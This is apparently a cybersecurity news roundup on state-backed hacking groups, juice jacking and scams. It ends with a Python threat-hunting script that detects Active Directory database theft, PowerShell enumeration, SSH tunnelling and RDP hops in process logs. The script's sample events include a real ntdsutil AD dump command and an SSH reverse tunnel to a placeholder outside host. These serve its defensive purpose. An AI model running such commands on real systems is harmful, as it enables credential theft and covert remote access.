Cyber incidents with country-level funding are all over the news. The state-backed groups activate botnets that hunt for critical CVEs: scanners that sweep a large number of sites for one specific critical CVE for which active exploitation code is already public. The concept is simple: find an unpatched system and exploit it. Typically those hunting campaigns begin a few hours after publication, to take advantage of the time it takes to patch the vulnerable systems.

According to Wikipedia: Juice jacking is a theoretical type of compromise of devices like phones and tablets which use the same cable for charging and data transfer, typically a USB cable. A week ago, the FBI issued a warning on "juice jacking" targeting electric vehicle charging stations with malware infection. That makes you wonder how many more theoretical threats can become reality, and how we didn't see it coming. The attack depends on the USB data lines being connected, so a charge-only cable or a data blocker between the device and an untrusted port removes that path.

And finally in the news, emotional scams with compelling texts such as "hi mom", "hi dad", "your package arrived", "tax refund", etc. Those just trigger your basic emotions to make you click the bait, and it is very tempting to do so.

World cyber

Microsoft: Iranian Hackers Moved From Recon to Targeting US Critical Infrastructure

The nation-state group is known as TA453, Ajax Security Team, Charming Kitten, APT35, Magic Hound, NewsBeef, Newscaster, and Phosphorus, and now Mint Sandstorm, per Microsoft's updated threat actor naming taxonomy. Initially focused on performing reconnaissance, the subgroup transitioned to directly targeting critical infrastructure organizations in the United States in 2022, including energy companies, seaports, transit systems, and a major utility and gas company. These attacks were "potentially in support of retaliatory destructive cyberattacks," Microsoft said.

"For example, Mint Sandstorm began exploiting CVE-2022-47966 in Zoho ManageEngine on January 19, 2023, the same day the POC became public. They later exploited CVE-2022-47986 in Aspera Faspex within five days of the POC being made public on February 2, 2023," Microsoft reports.

In some attacks, the subgroup uses PowerShell scripts for account enumeration and RDP connections and an SSH tunnel for command-and-control (C&C), to steal the victim's Active Directory database, compromise user credentials, and access user accounts.

Pakistani Hackers Use Linux Malware Poseidon to Target Indian Government Agencies

The Pakistan-based advanced persistent threat (APT) actor known as Transparent Tribe used a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.

"It is a general-purpose backdoor that provides attackers with a wide range of capabilities to hijack an infected host. Its functionalities include logging keystrokes, taking screen captures, uploading and downloading files, and remotely administering the system in various ways."

Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities.

"When a user interacts with the malicious version of Kavach, the genuine login page is displayed to distract them," Sandapolla explained. "Meanwhile, the payload is downloaded in the background, compromising the user's system."

Google: Ukraine targeted by 60% of Russian phishing attacks in 2023
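The Mint Sandstorm excerpt above lists a post-exploitation chain worth hunting for on any Windows estate: PowerShell account enumeration, RDP hops, an SSH tunnel carrying command-and-control, and theft of the Active Directory database. As an added example (not code from the original post, from Microsoft's report, or from any of the outlets quoted), the script below runs that hunt over process-creation events. Everything in it is an assumption for the demo: the events are constructed, the field names (ts, host, user, image, cmdline) only mimic Sysmon Event ID 1, and the ntdsutil/vssadmin/ntds.dit patterns are the usual NTDS.dit theft methods (ATT&CK T1003.003) rather than something the excerpt says this actor used.

```python
import json
import re
from collections import defaultdict

# Constructed sample events (assumption: one JSON object per line, Sysmon-like field names).
# Hosts WS22 and DEV03 are benign noise: a scheduled inventory script and a git ssh check.
SAMPLE_EVENTS = r"""
{"ts":"2023-02-07T01:02:03Z","host":"DC01","user":"CORP\\svc_backup","image":"C:\\Windows\\System32\\ntdsutil.exe","cmdline":"ntdsutil.exe \"ac i ntds\" \"ifm\" \"create full C:\\temp\\x\" q q"}
{"ts":"2023-02-07T01:03:10Z","host":"WS17","user":"CORP\\jdoe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -nop -w hidden -c \"Get-ADUser -Filter * -Properties * | Export-Csv C:\\temp\\u.csv\""}
{"ts":"2023-02-07T01:04:44Z","host":"WS17","user":"CORP\\jdoe","image":"C:\\Windows\\System32\\OpenSSH\\ssh.exe","cmdline":"ssh.exe -N -R 3389:127.0.0.1:3389 -p 443 user@203.0.113.10"}
{"ts":"2023-02-07T01:05:00Z","host":"WS17","user":"CORP\\jdoe","image":"C:\\Windows\\System32\\mstsc.exe","cmdline":"mstsc.exe /v:DC01"}
{"ts":"2023-02-07T09:00:00Z","host":"WS22","user":"CORP\\asmith","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -File C:\\scripts\\inventory.ps1"}
{"ts":"2023-02-07T09:10:00Z","host":"DEV03","user":"CORP\\bob","image":"C:\\Program Files\\Git\\usr\\bin\\ssh.exe","cmdline":"ssh.exe -T git@github.com"}
"""

# (technique name, image-name pattern, command-line pattern); all matched case-insensitively.
# The ntds_dump patterns are an assumption about how the AD database gets stolen (T1003.003).
TECHNIQUES = [
    ("ntds_dump", r"(?:ntdsutil|vssadmin|esentutl)\.exe$",
     r"\bifm\b|ac i ntds|activate instance ntds|create\s+shadow|ntds\.dit"),
    ("ps_ad_enum", r"powershell(?:_ise)?\.exe$|pwsh\.exe$",
     r"Get-AD(?:User|Group|GroupMember|Computer|DomainController)\b|net\s+(?:user|group)\b.*/domain"),
    # -R/-L/-D set up a reverse, local or dynamic tunnel; -N means "no remote command", tunnel only.
    ("ssh_tunnel", r"ssh\.exe$", r"(?:^|\s)-[RLDN]\b"),
    ("rdp_client", r"mstsc\.exe$", r"."),
]
COMPILED = [(name, re.compile(img, re.I), re.compile(cmd, re.I)) for name, img, cmd in TECHNIQUES]


def parse_events(text):
    """Parse one JSON event per line; blank and malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def hunt(events):
    """Return one finding per (event, technique) pair whose image and command line both match."""
    findings = []
    for ev in events:
        image = ev.get("image", "")
        cmdline = ev.get("cmdline", "")
        for name, img_re, cmd_re in COMPILED:
            if img_re.search(image) and cmd_re.search(cmdline):
                findings.append({"ts": ev.get("ts"), "host": ev.get("host"),
                                 "user": ev.get("user"), "technique": name,
                                 "cmdline": cmdline})
    return findings


def correlate(findings, min_techniques=2):
    """Group findings by host and keep hosts showing at least min_techniques distinct techniques.

    A lone RDP launch is normal admin activity; RDP plus an SSH reverse tunnel plus AD
    enumeration from the same host is the chain the excerpt describes.
    """
    by_host = defaultdict(set)
    for f in findings:
        by_host[f["host"]].add(f["technique"])
    return {h: sorted(t) for h, t in by_host.items() if len(t) >= min_techniques}


def high_severity(findings):
    """NTDS database theft is worth an alert on its own, without waiting for correlation."""
    return [f for f in findings if f["technique"] == "ntds_dump"]


if __name__ == "__main__":
    fs = hunt(parse_events(SAMPLE_EVENTS))
    for f in fs:
        print(f"{f['ts']} {f['host']} {f['user']} {f['technique']}: {f['cmdline']}")
    print("correlated hosts:", correlate(fs))
    print("ntds alerts on:", [f["host"] for f in high_severity(fs)])
```

On the constructed input the hunt flags DC01 for the ntdsutil IFM export and correlates WS17 across enumeration, tunnel and RDP, while the inventory script and the git ssh check on the other two hosts produce nothing. In production the same logic would run over a SIEM export of Sysmon or Security 4688 events with command-line auditing enabled; without command-line logging the ntdsutil and ssh patterns have nothing to match.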